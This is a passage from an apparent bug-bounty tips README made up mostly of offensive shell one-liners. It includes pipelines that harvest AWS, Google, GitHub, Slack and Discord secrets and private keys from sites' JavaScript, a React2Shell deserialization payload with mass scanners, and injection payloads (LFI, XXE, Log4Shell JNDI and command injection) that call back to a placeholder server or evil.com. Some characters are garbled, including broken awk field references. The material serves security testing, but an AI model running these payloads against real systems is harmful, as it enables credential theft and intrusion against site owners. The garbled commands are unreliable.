Extracts all relative API paths from JavaScript, filters static assets
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" && echo "Found in: {}"' | tee aws_keys_js.txt
Hunts for AWS Access Key IDs (AKIA, ABIA, ACCA, ASIA patterns)
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(AIza[0-9A-Za-z_-]{35}|[a-z0-9-]+\.firebaseio\.com|[a-z0-9-]+\.firebaseapp\.com)" && echo "[SOURCE] {}"' | tee google_firebase_keys.txt
Extracts Google API keys and Firebase database/app URLs
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "([a-zA-Z0-9_-]+\.s3\.amazonaws\.com|s3\.amazonaws\.com\/[a-zA-Z0-9_-]+|[a-zA-Z0-9_-]+\.s3\.[a-z0-9-]+\.amazonaws\.com)" | sort -u' | anew s3_buckets_js.txt && cat s3_buckets_js.txt | xargs -I{} sh -c 'curl -sI https://{} 2>/dev/null | head -1 | grep -qE "200|403" && echo "[ACCESSIBLE] {}"'
Finds S3 buckets in JS and validates accessibility
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(10\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}|172\.(1[6-9]|2[0-9]|3[01])\.[0-9]{1,3}\.[0-9]{1,3}|192\.168\.[0-9]{1,3}\.[0-9]{1,3})" && echo "[SOURCE] {}"' | sort -u | tee internal_ips_js.txt
Discovers internal/private IP addresses leaked in JavaScript (10.x, 172.16-31.x, 192.168.x)
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(https://hooks\.slack\.com/services/[A-Za-z0-9/]+|[MN][A-Za-z\d]{23,}\.[\w-]{6}\.[\w-]{27})" && echo "[SOURCE] {}"' | tee slack_discord_js.txt
Extracts Slack webhook URLs and Discord bot tokens
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "(ghp_[a-zA-Z0-9]{36}|gho_[a-zA-Z0-9]{36}|ghu_[a-zA-Z0-9]{36}|ghs_[a-zA-Z0-9]{36}|ghr_[a-zA-Z0-9]{36}|github_pat_[a-zA-Z0-9]{22}_[a-zA-Z0-9]{59}|-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----)" && echo "[SOURCE] {}"' | tee github_privkeys_js.txt
Finds GitHub personal access tokens (all formats) and private key headers
β‘ 9. Email Addresses + Hidden Subdomains in JS
cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}" | sort -u' | anew emails_js.txt && cat js_files.txt | xargs -P 20 -I{} sh -c 'curl -sk {} 2>/dev/null | grep -oE "https?://[a-zA-Z0-9._-]+\.target\.com[a-zA-Z0-9./?=_-]*"' | unfurl domains | sort -u | anew hidden_subdomains_js.txt
Extracts email addresses and hidden subdomains referenced in JavaScript
TARGET="target.com"; mkdir -p js_recon_$TARGET && cat alive.txt | katana -silent -em js -jc -d 3 | grep -iE "\.js(\?|$)" | httpx -silent -mc 200 | anew js_recon_$TARGET/js_urls.txt && cat js_recon_$TARGET/js_urls.txt | xargs -P 30 -I{} sh -c 'curl -sk {} 2>/dev/null | tee -a js_recon_$TARGET/all_js.txt' && grep -oE "(AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/aws_keys.txt; grep -oE "AIza[0-9A-Za-z_-]{35}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/google_keys.txt; grep -oE "ghp_[a-zA-Z0-9]{36}" js_recon_$TARGET/all_js.txt > js_recon_$TARGET/github_tokens.txt; grep -oE '["'"'"']/[a-zA-Z0-9_/-]+["'"'"']' js_recon_$TARGET/all_js.txt | tr -d '\"'"'"'' | sort -u > js_recon_$TARGET/endpoints.txt; echo "[+] JS Recon Complete! Check js_recon_$TARGET/"
Complete JS recon pipeline: discovers JS files, downloads all, extracts AWS/Google/GitHub keys and API endpoints
π― Pro Tip: Use
nuclei -t exposures/tokens/on discovered secrets to validate if they're active!
π Critical RCE in React Server Components & Next.js - Under active exploitation! Added to CISA KEV π
cat alive.txt | httpx -silent -match-string "/_next/" -match-string "__NEXT_DATA__" | anew nextjs_targets.txt
curl -s -o /dev/null -w "%{http_code}" -X POST https://target.com -H "Next-Action: test" -H "Content-Type: text/plain" --data '0'
cat alive.txt | xargs -I@ -P20 sh -c 'RES=$(curl -s -o /dev/null -w "%{http_code}" -X POST @ -H "Next-Action: x" --data "0" 2>/dev/null); [ "$RES" != "404" ] && [ "$RES" != "000" ] && echo "POTENTIALLY VULN: @ [$RES]"' | tee react2shell_candidates.txt
# Create payload.json (safe math check - no RCE) echo '{"then":"1γγ«:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B0\"}","_response":{"_prefix":"7*7","_formData":{"get":"1γγ«:constructor:constructor"}}}' > payload.json && echo '"$@0"' > trigger.txt
curl -X POST https://target.com -H "Next-Action: check" -F "0=@payload.json" -F "1=@trigger.txt" --max-time 5 -v 2>&1 | grep -iE "(49|error|stack|trace)"
subfinder -d target.com -silent | httpx -silent | while read url; do CODE=$(curl -s -o /dev/null -w "%{http_code}" -X POST "$url" -H "Next-Action: x" -H "Content-Type: text/plain" --data "0" 2>/dev/null); [[ "$CODE" =~ ^(200|400|500)$ ]] && echo "[NEXT-ACTION ACCEPTED] $url - HTTP $CODE"; done | tee nextjs_react2shell.txt
cat nextjs_targets.txt | xargs -I@ -P10 sh -c 'curl -s -I -X POST @ -H "Next-Action: test" 2>/dev/null | grep -qi "x-action-redirect" && echo "VULN INDICATOR: @"'
cat alive.txt | httpx -silent -method POST -H "Next-Action: probe" -mc 200,400,500 -title -tech-detect | grep -i "next" | anew react2shell_potential.txt
shodan search "X-Powered-By: Next.js" --fields ip_str,port,hostnames | awk '{print "https://"1γγ«":"2γγ«}' | httpx -silent | anew shodan_nextjs.txt
nuclei -l nextjs_targets.txt -t http/cves/2025/CVE-2025-55182.yaml -c 30 -o react2shell_nuclei.txt
subfinder -d target.com -silent | httpx -silent -match-string "/_next/" | tee nextjs.txt | xargs -I@ -P15 sh -c 'R=$(curl -s -w "\n%{http_code}" -X POST @ -H "Next-Action: x" --data "test" 2>/dev/null | tail -1); [ "$R" = "200" ] || [ "$R" = "400" ] && echo "[!] REACT2SHELL CANDIDATE: @"' | anew vuln_candidates.txt
curl -s -X POST "https://target.com/" -H "Next-Action: whatever" -H "Content-Type: multipart/form-data; boundary=----FormBoundary" --data-binary $'------FormBoundary\r\nContent-Disposition: form-data; name="0"\r\n\r\ntest\r\n------FormBoundary--' | head -c 500
cat urls.txt | parallel -j20 'curl -s -o /dev/null -w "{} - %{http_code}\n" -X POST {} -H "Next-Action: test" --data "0" 2>/dev/null' | grep -E " - (200|400|500)$" | tee react2shell_batch.txt
β οΈ Affected: React 19.0.0-19.2.0, Next.js 15.0.4-16.0.6 | β Fix: Update to React 19.0.1/19.1.2/19.2.1π― Key Detection: Apps accepting
Next-Actionheader + RSC deserialization = Potential RCE
echo "https://target.com" | nuclei -dast -t dast/vulnerabilities/xss/ -rl 5
cat urls.txt | gf redirect | qsreplace "https://evil.com" | httpx -silent -location | grep "evil.com"
cat urls.txt | httpx -silent -H "Origin: https://evil.com" -match-string "evil.com" | anew cors_vuln.txt
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -match-string "evil.com"
cat urls.txt | qsreplace "%0d%0aX-Injected: header" | httpx -silent -match-string "X-Injected"
cat js.txt | xargs -I@ curl -s @ | grep -E "(__proto__|constructor\.prototype)" | anew proto_pollution.txt
cat urls.txt | httpx -silent -H "X-Forwarded-Host: evil.com" -H "X-Original-URL: /admin" -mc 200
cat urls.txt | grep -oE "(id|user|account|uid|pid)=[0-9]+" | sort -u | anew idor_candidates.txt
cat urls.txt | grep -iE "(redeem|coupon|vote|like|follow|transfer|withdraw)" | anew race_condition.txt
cat urls.txt | grep -iE "(socket|ws://|wss://)" | anew websocket.txt
cat urls.txt | gf lfi | qsreplace "....//....//....//etc/passwd" | httpx -silent -match-string "root:x"
cat urls.txt | grep -iE "\.(xml|soap)" | qsreplace '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'
cat urls.txt | qsreplace '${jndi:ldap://YOURSERVER/a}' | httpx -silent -H 'X-Api-Version: ${jndi:ldap://YOURSERVER/a}'
cat urls.txt | qsreplace "\`curl YOURSERVER\`" | httpx -silent cat urls.txt | qsreplace "| curl YOURSERVER" | httpx -silent
cat alive.txt | xargs -I@ gowitness single @ -o screenshots/cat alive.txt | httpx -silent -tech-detect -status-code -title | anew tech_stack.txt
curl -s https://target.com/favicon.ico | md5sum | awk '{print 1γγ«}'
cat alive.txt | httpx -silent -path /admin,/administrator,/admin.php,/wp-admin,/manager,/phpmyadmin -mc 200,301,302 | anew admin_panels.txt
cat alive.txt | httpx -silent -path /debug,/trace,/actuator,/metrics,/health,/info -mc 200 | anew debug_endpoints.txt
cat alive.txt | httpx -silent -path /actuator/env,/actuator/heapdump,/actuator/mappings -mc 200 | anew spring_actuators.txt
cat alive.txt | httpx -silent -path /wp-json/wp/v2/users -mc 200 | anew wp_users.txt
cat alive.txt | httpx -silent -match-string "Whoops" -match-string "Laravel" | anew laravel_debug.txt
cat alive.txt | httpx -silent -match-string "Django" -match-string "DEBUG" | anew django_debug.txt
cat alive.txt | python3 smuggler.py -q 2>/dev/null | anew smuggling.txt
cat alive.txt | httpx -silent -include-response-header | grep -i "content-security-policy" | anew csp_headers.txt
curl -s https://target.com/favicon.ico | python3 -c "import mmh3,sys,codecs;print(mmh3.hash(codecs.encode(sys.stdin.buffer.read(),'base64')))"
| Engine | Link | Description |
|---|---|---|
| Shodan | shodan.io | IoT & device search |
| Censys | censys.io | Internet scan data |
| Fofa | fofa.info | Cyberspace search |
| ZoomEye | zoomeye.org | Cyberspace mapping |
| Hunter | hunter.how | Asset discovery |
| Netlas | netlas.io | Attack surface |
| GreyNoise | greynoise.io | Internet scanners |
| Onyphe | onyphe.io | Cyber defense |
| CriminalIP | criminalip.io | Threat intel |
| FullHunt | fullhunt.io | Attack surface |
| Quake | quake.360.net | Cyberspace search |
| Leakix | leakix.net | Leak detection |
| URLScan | urlscan.io | URL analysis |
| DNSDumpster | dnsdumpster.com | DNS recon |
| crt.sh | crt.sh | Certificate search |
| SecurityTrails | securitytrails.com | DNS history |
| Pulsedive | pulsedive.com | Threat intel |
| VirusTotal | virustotal.com | File/URL analysis |
| PublicWWW | publicwww.com | Source code search |
| Grep.app | grep.app | GitHub code search |
| Wordlist | Link | Use Case |
|---|---|---|
| SecLists | GitHub | Everything |
| FuzzDB | GitHub | Fuzzing |
| Assetnote | wordlists.assetnote.io | Web content |
| OneListForAll | GitHub | Combined |
| jhaddix all.txt | GitHub | Directories |
| commonspeak2 | GitHub | Real-world |
- Web Application Hacker's Handbook
- Real-World Bug Hunting by Peter Yaworski
- Bug Bounty Bootcamp by Vickie Li
| Hunter | Hunter | Hunter |
|---|---|---|
| @bt0s3c | @MrCl0wnLab | @stokfredrik |
| @Jhaddix | @TomNomNom | @NahamSec |
| @zseano | @pry0cc | @pdiscoveryio |
| @jeff_foley | @haaborern | @0xacb |
We welcome contributions from the community! Your expertise makes this repository better.
π Click to see contribution guidelines
-
Fork the Repository
git clone https://github.com/KingOfBugbounty/KingOfBugBountyTips.git cd KingOfBugBountyTips -
Create a New Branch
git checkout -b feature/your-contribution
-
Add Your Content
- Add new one-liners with proper documentation
- Include source references and explanations
- Follow the existing format and structure
-
Submit Pull Request
- Write a clear description of your changes
- Reference any related issues
- Wait for review and feedback
- π― New bug bounty one-liners and techniques
- π§ Tool installation guides and tips
- π Additional resources and references
- π Bug fixes and improvements
- π Documentation enhancements
- π Translations to other languages
If this repository helped you in your bug bounty journey, consider supporting the project!
Buy Me A CoffeeGive this repository a star if you found it helpful!
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β β οΈ LEGAL NOTICE β οΈ β
β ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ£
β This repository is for EDUCATIONAL PURPOSES ONLY β
β β
β β
DO: Use for authorized security testing β
β β
DO: Learn and understand the techniques β
β β
DO: Contribute and share knowledge β
β β
β β DON'T: Use for unauthorized testing β
β β DON'T: Use for malicious purposes β
β β DON'T: Violate laws or regulations β
β β
β The authors are NOT responsible for any misuse or damage β
β caused by this information. Always test responsibly! β
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
| Resource | Link |
|---|---|
| π Homepage | King of Bug Bounty Tips |
| π οΈ KingRecon DOD | Automated Recon Tool |
| π§ BugBuntu OS | Download Here |
| πΊ YouTube Channel | OFJAAAH |
| π¬ Telegram Group | Join Community |
| π¦ Twitter/X | @ofjaaah |
| πΌ LinkedIn | Connect |
| π Report Issues | GitHub Issues |
| π Security Issues | Security Advisory |
To all contributors, bug bounty hunters, and the security community who make this project possible!
Last Updated: January 2026 | Version: 4.5
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "Stay curious, stay ethical, stay hungry" π΄ββ οΈ β
β Happy Hunting! π β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Made with β€οΈ by the Bug Bounty Community